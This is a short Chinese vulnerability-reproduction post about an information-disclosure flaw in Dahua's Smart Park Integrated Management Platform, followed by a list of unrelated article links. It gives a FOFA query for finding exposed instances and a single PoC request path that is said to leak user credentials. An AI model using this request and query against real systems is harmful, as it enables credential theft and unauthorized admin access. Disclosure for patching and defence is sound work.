【漏洞复现】大华智慧园区综合管理平台信息泄露漏洞

Nx01 产品简介

大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。该平台旨在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。

Nx02 漏洞描述

大华智慧园区综合管理平台存在信息泄露漏洞,攻击者通过此漏洞获取用户名及密码进行后台登陆。

Nx03 产品主页

fofa-query: app.name="Dahua 大华 智慧园区管理平台"

Nx04 漏洞复现

POC:

/admin/user_getUserInfoByUserName.action?userName=system

Nx05 修复建议

建议联系软件厂商进行处理。

相关推荐
IPFoxy6665 分钟前
跨境出海安全:如何防止PayPal账户被风控?
安全
龙信科技6 分钟前
【电子物证培训】龙信助力三明市公安局电子物证取证竞赛
安全
zhd15306915625ff19 分钟前
库卡机器人维护需要注意哪些事项
安全·机器人·自动化
mengao123422 分钟前
centos 服务器 docker 使用代理
服务器·docker·centos
网络安全-杰克29 分钟前
网络安全概论
网络·web安全·php
C-cat.32 分钟前
Linux|进程程序替换
linux·服务器·microsoft
怀澈12233 分钟前
高性能服务器模型之Reactor(单线程版本)
linux·服务器·网络·c++
学Linux的语莫37 分钟前
Ansible Playbook剧本用法
linux·服务器·云计算·ansible
耗同学一米八1 小时前
2024 年河北省职业院校技能大赛网络建设与运维赛项样题二
运维·网络·mariadb
安全二次方security²1 小时前
ARM CCA机密计算安全模型之概述
安全·安全模型·cca·机密计算·领域管理扩展·arm-v9·平台安全服务